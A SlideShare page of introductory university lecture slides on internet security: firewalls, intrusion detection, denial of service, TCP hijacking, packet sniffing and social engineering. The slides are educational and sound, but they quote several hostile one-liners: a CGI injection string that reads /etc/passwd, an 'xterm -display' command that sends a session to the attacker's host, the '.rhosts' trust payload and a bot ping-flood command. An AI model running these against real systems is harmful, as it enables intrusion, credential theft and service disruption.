SlideShare una empresa de Scribd logo
1 de 52
Descargar para leer sin conexión
Internet Security

 Chapter 12
 BITS2513 : Internet Technology




                                  1
A Brief History of the World




                               2
Overview
 What is security?
 Why do we need security?
 Who is vulnerable?
 Common security attacks and countermeasures
    –   Firewalls & Intrusion Detection Systems
    –   Denial of Service Attacks
    –   TCP Attacks
    –   Packet Sniffing
    –   Social Problems

                                                  3
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
       • 1. A group or department of private guards: Call building security
         if a visitor acts suspicious.
       • 2. Measures adopted by a government to prevent espionage,
         sabotage, or attack.
       • 3. Measures adopted, as by a business or homeowner, to prevent
         a crime such as burglary or assault: Security was lax at the firm's
         smaller plant.
    …etc.

                                                                          4
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
       • 1. A group or department of private guards: Call building security
         if a visitor acts suspicious.
       • 2. Measures adopted by a government to prevent espionage,
         sabotage, or attack.
       • 3. Measures adopted, as by a business or homeowner, to prevent
         a crime such as burglary or assault: Security was lax at the firm's
         smaller plant.
    …etc.

                                                                          5
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
       • 1. A group or department of private guards: Call building security
         if a visitor acts suspicious.
       • 2. Measures adopted by a government to prevent espionage,
         sabotage, or attack.
       • 3. Measures adopted, as by a business or homeowner, to prevent
         a crime such as burglary or assault: Security was lax at the firm's
         smaller plant.
    …etc.

                                                                          6
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
       • 1. A group or department of private guards: Call building security
         if a visitor acts suspicious.
       • 2. Measures adopted by a government to prevent espionage,
         sabotage, or attack.
       • 3. Measures adopted, as by a business or homeowner, to prevent
         a crime such as burglary or assault: Security was lax at the firm's
         smaller plant.
    …etc.

                                                                          7
Why do we need security?
   Protect vital information while still allowing
    access to those who need it
    – Trade secrets, medical records, etc.
   Provide authentication and access control
    for resources
    – Ex: AFS
   Guarantee availability of resources
    – Ex: 5 9’s (99.999% reliability)

                                                     8
Who is vulnerable?
 Financial institutions and banks
 Internet service providers
 Pharmaceutical companies
 Government and defense agencies
 Contractors to various government agencies
 Multinational corporations
 ANYONE ON THE NETWORK

                                               9
Common security attacks and
their countermeasures
   Finding a way into the network
    – Firewalls
   Exploiting software bugs, buffer overflows
    – Intrusion Detection Systems
   Denial of Service
    – Ingress filtering, IDS
   TCP hijacking
    – IPSec
   Packet sniffing
    – Encryption (SSH, SSL, HTTPS)
   Social problems
    – Education

                                                 10
Firewalls
   Basic problem – many network applications
    and protocols have security problems that
    are fixed over time
    – Difficult for users to keep up with changes and
      keep host secure
    – Solution
       • Administrators limit access to end hosts by using a
         firewall
       • Firewall is kept up-to-date by administrators

                                                               11
Firewalls
   A firewall is like a castle with a drawbridge
    – Only one point of access into the network
    – This can be good or bad
   Can be hardware or software
    – Ex. Some routers come with firewall functionality
    – ipfw, ipchains, pf on Unix systems, Windows XP
      and Mac OS X have built in firewalls


                                                      12
Firewalls

   Internet                   DMZ
                         Web server, email
                         server, web proxy,
                         etc
              Firewall




                                              Firewall
                                                         Intranet

                                                                    13
Firewalls
   Used to filter packets based on a combination of
    features
    – These are called packet filtering firewalls
       • There are other types too, but they will not be discussed
    – Ex. Drop packets with destination port of 23 (Telnet)
    – Can use any combination of IP/UDP/TCP header
      information
    – man ipfw on unix47 for much more detail
   But why don’t we just turn Telnet off?

                                                                     14
Firewalls
   Here is what a computer with a default
    Windows XP install looks like:
    –   135/tcp open loc-srv
    –   139/tcp open netbios-ssn
    –   445/tcp open microsoft-ds
    –   1025/tcp open NFS-or-IIS
    –   3389/tcp open ms-term-serv
    –   5000/tcp open UPnP

   Might need some of these services, or might
    not be able to control all the machines on the
    network
                                                 15
Firewalls
   What does a firewall rule look like?
    – Depends on the firewall used
   Example: ipfw
    – /sbin/ipfw add deny tcp from cracker.evil.org to
      wolf.tambov.su telnet

   Other examples: WinXP & Mac OS X have
    built in and third party firewalls
    – Different graphical user interfaces
    – Varying amounts of complexity and power
                                                         16
Intrusion Detection
   Used to monitor for “suspicious activity” on a
    network
    – Can protect against known software exploits, like
      buffer overflows
   Open Source IDS: Snort, www.snort.org




                                                      17
Intrusion Detection
   Uses “intrusion signatures”
    – Well known patterns of behavior
       • Ping sweeps, port scanning, web server indexing, OS
         fingerprinting, DoS attempts, etc.
   Example
    – IRIX vulnerability in webdist.cgi
    – Can make a rule to drop packets containing the line
       • “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”

   However, IDS is only useful if contingency plans
    are in place to curb attacks as they are occurring

                                                               18
Minor Detour…
 Say we got the /etc/passwd file from the IRIX
  server
 What can we do with it?




                                              19
Dictionary Attack
   We can run a dictionary attack on the passwords
    – The passwords in /etc/passwd are encrypted with the
      crypt(3) function (one-way hash)
    – Can take a dictionary of words, crypt() them all, and
      compare with the hashed passwords
   This is why your passwords should be meaningless
    random junk!
    – For example, “sdfo839f” is a good password
       • That is not my andrew password
       • Please don’t try it either

                                                              20
Denial of Service
 Purpose: Make a network service unusable,
  usually by overloading the server or network
 Many different kinds of DoS attacks
    – SYN flooding
    – SMURF
    – Distributed attacks
    – Mini Case Study: Code-Red


                                                 21
Denial of Service
 SYN flooding attack
 Send SYN packets with bogus source address
    – Why?
   Server responds with SYN ACK and keeps state
    about TCP half-open connection
    – Eventually, server memory is exhausted with this state
   Solution: use “SYN cookies”
    – In response to a SYN, create a special “cookie” for the
      connection, and forget everything else
    – Then, can recreate the forgotten information when the
      ACK comes in from a legitimate connection
                                                                22
Denial of Service




                    23
Denial of Service
   SMURF
    – Source IP address of a broadcast ping is forged
    – Large number of machines respond back to
      victim, overloading it




                                                        24
Denial of Service
             ICMP echo (spoofed source address of victim)
                    Sent to IP broadcast address
             ICMP echo reply




                            Internet



       Perpetrator                               Victim




                                                            25
Denial of Service
   Distributed Denial of Service
    – Same techniques as regular DoS, but on a much larger
      scale
    – Example: Sub7Server Trojan and IRC bots
       • Infect a large number of machines with a “zombie” program
       • Zombie program logs into an IRC channel and awaits commands
       • Example:
          – Bot command: !p4 207.71.92.193
          – Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
          – Sends 10,000 64k packets to the host (655MB!)
       • Read more at: http://grc.com/dos/grcdos.htm

                                                                    26
Denial of Service
   Mini Case Study – CodeRed
    – July 19, 2001: over 359,000 computers infected
      with Code-Red in less than 14 hours
    – Used a recently known buffer exploit in Microsoft
      IIS
    – Damages estimated in excess of $2.6 billion




                                                      27
Denial of Service
   Why is this under the Denial of Service
    category?
    – CodeRed launched a DDOS attack against
      www1.whitehouse.gov from the 20th to the 28th
      of every month!
    – Spent the rest of its time infecting other hosts




                                                         28
Denial of Service
   How can we protect ourselves?
    – Ingress filtering
       • If the source IP of a packet comes in on an interface
         which does not have a route to that packet, then drop
         it
       • RFC 2267 has more information about this
    – Stay on top of CERT advisories and the latest
      security patches
       • A fix for the IIS buffer overflow was released sixteen
         days before CodeRed had been deployed!
                                                                  29
TCP Attacks
   Recall how IP works…
    – End hosts create IP packets and routers process
      them purely based on destination address alone
   Problem: End hosts may lie about other fields
    which do not affect delivery
    – Source address – host may trick destination into
      believing that the packet is from a trusted source
       • Especially applications which use IP addresses as a
         simple authentication method
       • Solution – use better authentication methods

                                                               30
TCP Attacks
   TCP connections have associated state
    – Starting sequence numbers, port numbers
   Problem – what if an attacker learns these
    values?
    – Port numbers are sometimes well known to begin
      with (ex. HTTP uses port 80)
    – Sequence numbers are sometimes chosen in
      very predictable ways

                                                  31
TCP Attacks
 If an attacker learns the associated TCP
  state for the connection, then the connection
  can be hijacked!
 Attacker can insert malicious data into the
  TCP stream, and the recipient will believe it
  came from the original source
    – Ex. Instead of downloading and running new
      program, you download a virus and execute it

                                                     32
TCP Attacks
   Say hello to Alice, Bob and Mr. Big Ears




                                               33
TCP Attacks
   Alice and Bob have an established TCP
    connection




                                            34
TCP Attacks
   Mr. Big Ears lies on the path between Alice
    and Bob on the network
    – He can intercept all of their packets




                                                  35
TCP Attacks
   First, Mr. Big Ears must drop all of Alice’s
    packets since they must not be delivered to
    Bob (why?)


                Packets

                                         The Void


                                                    36
TCP Attacks
   Then, Mr. Big Ears sends his malicious
    packet with the next ISN (sniffed from the
    network)




                                 ISN, SRC=Alice


                                                  37
TCP Attacks
   What if Mr. Big Ears is unable to sniff the
    packets between Alice and Bob?
    – Can just DoS Alice instead of dropping her
      packets
    – Can just send guesses of what the ISN is until it
      is accepted
   How do you know when the ISN is accepted?
    – Mitnick: payload is “add self to .rhosts”
    – Or, “xterm -display MrBigEars:0”

                                                          38
TCP Attacks
   Why are these types of TCP attacks so
    dangerous?




      Web server                    Trusting web client


                   Malicious user                   39
TCP Attacks
 How do we prevent this?
 IPSec
    – Provides source authentication, so Mr. Big Ears
      cannot pretend to be Alice
    – Encrypts data before transport, so Mr. Big Ears
      cannot talk to Bob without knowing what the
      session key is



                                                        40
Five Minute Break
   For your enjoyment, here is something
    completely unrelated to this lecture:




                                            41
Packet Sniffing
 Recall how Ethernet works …
 When someone wants to send a packet to
  some else …
 They put the bits on the wire with the
  destination MAC address …
 And remember that other hosts are listening
  on the wire to detect for collisions …
 It couldn’t get any easier to figure out what
  data is being transmitted over the network!
                                                  42
Packet Sniffing
 This works for wireless too!
 In fact, it works for any broadcast-based
  medium




                                              43
Packet Sniffing
 What kinds of data can we get?
 Asked another way, what kind of information
  would be most useful to a malicious user?
 Answer: Anything in plain text
    – Passwords are the most popular




                                                44
Packet Sniffing
   How can we protect ourselves?
   SSH, not Telnet
    – Many people at CMU still use Telnet and send their password in the
      clear (use PuTTY instead!)
    – Now that I have told you this, please do not exploit this information
    – Packet sniffing is, by the way, prohibited by Computing Services
   HTTP over SSL
    – Especially when making purchases with credit cards!
   SFTP, not FTP
    – Unless you really don’t care about the password or data
    – Can also use KerbFTP (download from MyAndrew)
   IPSec
    – Provides network-layer confidentiality
                                                                          45
Social Problems
   People can be just as dangerous as
    unprotected computer systems
    – People can be lied to, manipulated, bribed,
      threatened, harmed, tortured, etc. to give up
      valuable information
    – Most humans will breakdown once they are at
      the “harmed” stage, unless they have been
      specially trained
       • Think government here…

                                                      46
Social Problems
   Fun Example 1:
    – “Hi, I’m your AT&T rep, I’m stuck on a pole. I
      need you to punch a bunch of buttons for me”




                                                       47
Social Problems
   Fun Example 2:
    – Someone calls you in the middle of the night
      • “Have you been calling Egypt for the last six hours?”
      • “No”
      • “Well, we have a call that’s actually active right now,
        it’s on your calling card and it’s to Egypt and as a
        matter of fact, you’ve got about $2000 worth of
        charges on your card and … read off your AT&T card
        number and PIN and then I’ll get rid of the charge for
        you”

                                                              48
Social Problems
   Fun Example 3:
    – Who saw Office Space?
    – In the movie, the three disgruntled employees
      installed a money-stealing worm onto the
      companies systems
    – They did this from inside the company, where
      they had full access to the companies systems
      • What security techniques can we use to prevent this
        type of access?

                                                              49
Social Problems
   There aren’t always solutions to all of these problems
    – Humans will continue to be tricked into giving out information they
      shouldn’t
    – Educating them may help a little here, but, depending on how bad
      you want the information, there are a lot of bad things you can do to
      get it
   So, the best that can be done is to implement a wide variety
    of solutions and more closely monitor who has access to
    what network resources and information
    – But, this solution is still not perfect




                                                                          50
Conclusions
 The Internet works only because we implicitly
  trust one another
 It is very easy to exploit this trust
 The same holds true for software
 It is important to stay on top of the latest
  CERT security advisories to know how to
  patch any security holes

                                              51
Security related URLs
 http://www.robertgraham.com/pubs/network-
  intrusion-detection.html
 http://online.securityfocus.com/infocus/1527
 http://www.snort.org/
 http://www.cert.org/
 http://www.nmap.org/
 http://grc.com/dos/grcdos.htm
 http://lcamtuf.coredump.cx/newtcp/

                                             52

Más contenido relacionado

La actualidad más candente

Network intrusi detection system
Network intrusi detection systemNetwork intrusi detection system
Network intrusi detection systemDuwinowo NT
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Julia Yu-Chin Cheng
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Rune - Empowering User-based Security
Rune  - Empowering User-based SecurityRune  - Empowering User-based Security
Rune - Empowering User-based SecurityRob Levey
 
Capture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseCapture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseFidelis Cybersecurity
 
Honeypots - The Art of Building Secure Systems by Making them Vulnerable
Honeypots - The Art of Building Secure Systems by Making them VulnerableHoneypots - The Art of Building Secure Systems by Making them Vulnerable
Honeypots - The Art of Building Secure Systems by Making them VulnerableAvădănei Andrei
 
HONEYPOTS: Definition, working, advantages, disadvantages
HONEYPOTS: Definition, working, advantages, disadvantagesHONEYPOTS: Definition, working, advantages, disadvantages
HONEYPOTS: Definition, working, advantages, disadvantagesamit kumar
 
Ce hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomCe hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomVi Tính Hoàng Nam
 
Ch03 Network and Computer Attacks
Ch03 Network and Computer AttacksCh03 Network and Computer Attacks
Ch03 Network and Computer Attacksphanleson
 
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation ThreatsWeaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation ThreatsLumension
 
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference
 
Total Defense Product Information
Total Defense Product InformationTotal Defense Product Information
Total Defense Product InformationZeeshan Humayun
 
Keynote fx try harder 2 be yourself
Keynote fx   try harder 2 be yourselfKeynote fx   try harder 2 be yourself
Keynote fx try harder 2 be yourselfDefconRussia
 

La actualidad más candente (18)

Network intrusi detection system
Network intrusi detection systemNetwork intrusi detection system
Network intrusi detection system
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Rune - Empowering User-based Security
Rune  - Empowering User-based SecurityRune  - Empowering User-based Security
Rune - Empowering User-based Security
 
Capture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseCapture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception Defense
 
Cryptppt1
Cryptppt1Cryptppt1
Cryptppt1
 
Honeypots - The Art of Building Secure Systems by Making them Vulnerable
Honeypots - The Art of Building Secure Systems by Making them VulnerableHoneypots - The Art of Building Secure Systems by Making them Vulnerable
Honeypots - The Art of Building Secure Systems by Making them Vulnerable
 
Network Security
Network SecurityNetwork Security
Network Security
 
HONEYPOTS: Definition, working, advantages, disadvantages
HONEYPOTS: Definition, working, advantages, disadvantagesHONEYPOTS: Definition, working, advantages, disadvantages
HONEYPOTS: Definition, working, advantages, disadvantages
 
Ce hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomCe hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atom
 
Ch03 Network and Computer Attacks
Ch03 Network and Computer AttacksCh03 Network and Computer Attacks
Ch03 Network and Computer Attacks
 
Ga13
Ga13Ga13
Ga13
 
Hvordan stopper du CryptoLocker?
Hvordan stopper du CryptoLocker?Hvordan stopper du CryptoLocker?
Hvordan stopper du CryptoLocker?
 
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation ThreatsWeaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
 
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
 
Ids
IdsIds
Ids
 
Total Defense Product Information
Total Defense Product InformationTotal Defense Product Information
Total Defense Product Information
 
Keynote fx try harder 2 be yourself
Keynote fx   try harder 2 be yourselfKeynote fx   try harder 2 be yourself
Keynote fx try harder 2 be yourself
 

Destacado

Lecture 4 -_internet_infrastructure_2_updated_2011
Lecture 4 -_internet_infrastructure_2_updated_2011Lecture 4 -_internet_infrastructure_2_updated_2011
Lecture 4 -_internet_infrastructure_2_updated_2011Serious_SamSoul
 
Lecture 13 -_e-commmerce_e-banking_and_advanced_tech
Lecture 13 -_e-commmerce_e-banking_and_advanced_techLecture 13 -_e-commmerce_e-banking_and_advanced_tech
Lecture 13 -_e-commmerce_e-banking_and_advanced_techSerious_SamSoul
 
Lecture 9 electronic_mail_representation_and_transfer
Lecture 9 electronic_mail_representation_and_transferLecture 9 electronic_mail_representation_and_transfer
Lecture 9 electronic_mail_representation_and_transferSerious_SamSoul
 
Lecture 11 client_server_interaction
Lecture 11 client_server_interactionLecture 11 client_server_interaction
Lecture 11 client_server_interactionSerious_SamSoul
 
Lecture 6 -_presentation_layer
Lecture 6 -_presentation_layerLecture 6 -_presentation_layer
Lecture 6 -_presentation_layerSerious_SamSoul
 
Lecture 7 -_ftp,_tftp,_telnet_and_ssh
Lecture 7 -_ftp,_tftp,_telnet_and_sshLecture 7 -_ftp,_tftp,_telnet_and_ssh
Lecture 7 -_ftp,_tftp,_telnet_and_sshSerious_SamSoul
 
Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-Serious_SamSoul
 
Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-Serious_SamSoul
 
Lecture 2 -_understanding_networks_with_presenter_notes
Lecture 2 -_understanding_networks_with_presenter_notesLecture 2 -_understanding_networks_with_presenter_notes
Lecture 2 -_understanding_networks_with_presenter_notesSerious_SamSoul
 
Lecture 3 -_internet_infrastructure_updated_2011
Lecture 3 -_internet_infrastructure_updated_2011Lecture 3 -_internet_infrastructure_updated_2011
Lecture 3 -_internet_infrastructure_updated_2011Serious_SamSoul
 
Lecture 5 internet-protocol_assignments
Lecture 5 internet-protocol_assignmentsLecture 5 internet-protocol_assignments
Lecture 5 internet-protocol_assignmentsSerious_SamSoul
 
서버 성능에 대한 정의와 이해
서버 성능에 대한 정의와 이해서버 성능에 대한 정의와 이해
서버 성능에 대한 정의와 이해중선 곽
 

Destacado (12)

Lecture 4 -_internet_infrastructure_2_updated_2011
Lecture 4 -_internet_infrastructure_2_updated_2011Lecture 4 -_internet_infrastructure_2_updated_2011
Lecture 4 -_internet_infrastructure_2_updated_2011
 
Lecture 13 -_e-commmerce_e-banking_and_advanced_tech
Lecture 13 -_e-commmerce_e-banking_and_advanced_techLecture 13 -_e-commmerce_e-banking_and_advanced_tech
Lecture 13 -_e-commmerce_e-banking_and_advanced_tech
 
Lecture 9 electronic_mail_representation_and_transfer
Lecture 9 electronic_mail_representation_and_transferLecture 9 electronic_mail_representation_and_transfer
Lecture 9 electronic_mail_representation_and_transfer
 
Lecture 11 client_server_interaction
Lecture 11 client_server_interactionLecture 11 client_server_interaction
Lecture 11 client_server_interaction
 
Lecture 6 -_presentation_layer
Lecture 6 -_presentation_layerLecture 6 -_presentation_layer
Lecture 6 -_presentation_layer
 
Lecture 7 -_ftp,_tftp,_telnet_and_ssh
Lecture 7 -_ftp,_tftp,_telnet_and_sshLecture 7 -_ftp,_tftp,_telnet_and_ssh
Lecture 7 -_ftp,_tftp,_telnet_and_ssh
 
Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-
 
Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-Lecture 1 -_overview_of_the_internet-1-
Lecture 1 -_overview_of_the_internet-1-
 
Lecture 2 -_understanding_networks_with_presenter_notes
Lecture 2 -_understanding_networks_with_presenter_notesLecture 2 -_understanding_networks_with_presenter_notes
Lecture 2 -_understanding_networks_with_presenter_notes
 
Lecture 3 -_internet_infrastructure_updated_2011
Lecture 3 -_internet_infrastructure_updated_2011Lecture 3 -_internet_infrastructure_updated_2011
Lecture 3 -_internet_infrastructure_updated_2011
 
Lecture 5 internet-protocol_assignments
Lecture 5 internet-protocol_assignmentsLecture 5 internet-protocol_assignments
Lecture 5 internet-protocol_assignments
 
서버 성능에 대한 정의와 이해
서버 성능에 대한 정의와 이해서버 성능에 대한 정의와 이해
서버 성능에 대한 정의와 이해
 

Similar a Lecture 12 -_internet_security

Similar a Lecture 12 -_internet_security (20)

Network Security
Network SecurityNetwork Security
Network Security
 
Network Security
Network  SecurityNetwork  Security
Network Security
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
 
Lesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptxLesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptx
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
network.ppt
network.pptnetwork.ppt
network.ppt
 
my lecture 21.network security.2023.ppt
my lecture 21.network security.2023.pptmy lecture 21.network security.2023.ppt
my lecture 21.network security.2023.ppt
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
Network Security
Network SecurityNetwork Security
Network Security
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
INTERNET SECURITY.ppt
INTERNET SECURITY.pptINTERNET SECURITY.ppt
INTERNET SECURITY.ppt
 
lec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.pptlec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.ppt
 
EC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR KEC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR K
 
lec security
lec securitylec security
lec security
 
Network security
Network securityNetwork security
Network security
 
Network Security
Network SecurityNetwork Security
Network Security
 
Chapter 6 network security
Chapter 6   network securityChapter 6   network security
Chapter 6 network security
 
Network security
Network securityNetwork security
Network security
 
Network security
Network securityNetwork security
Network security
 
Network security
Network securityNetwork security
Network security
 

Último

QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 

Último (20)

QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Testing tools and AI - ideas what to try with some tool examples
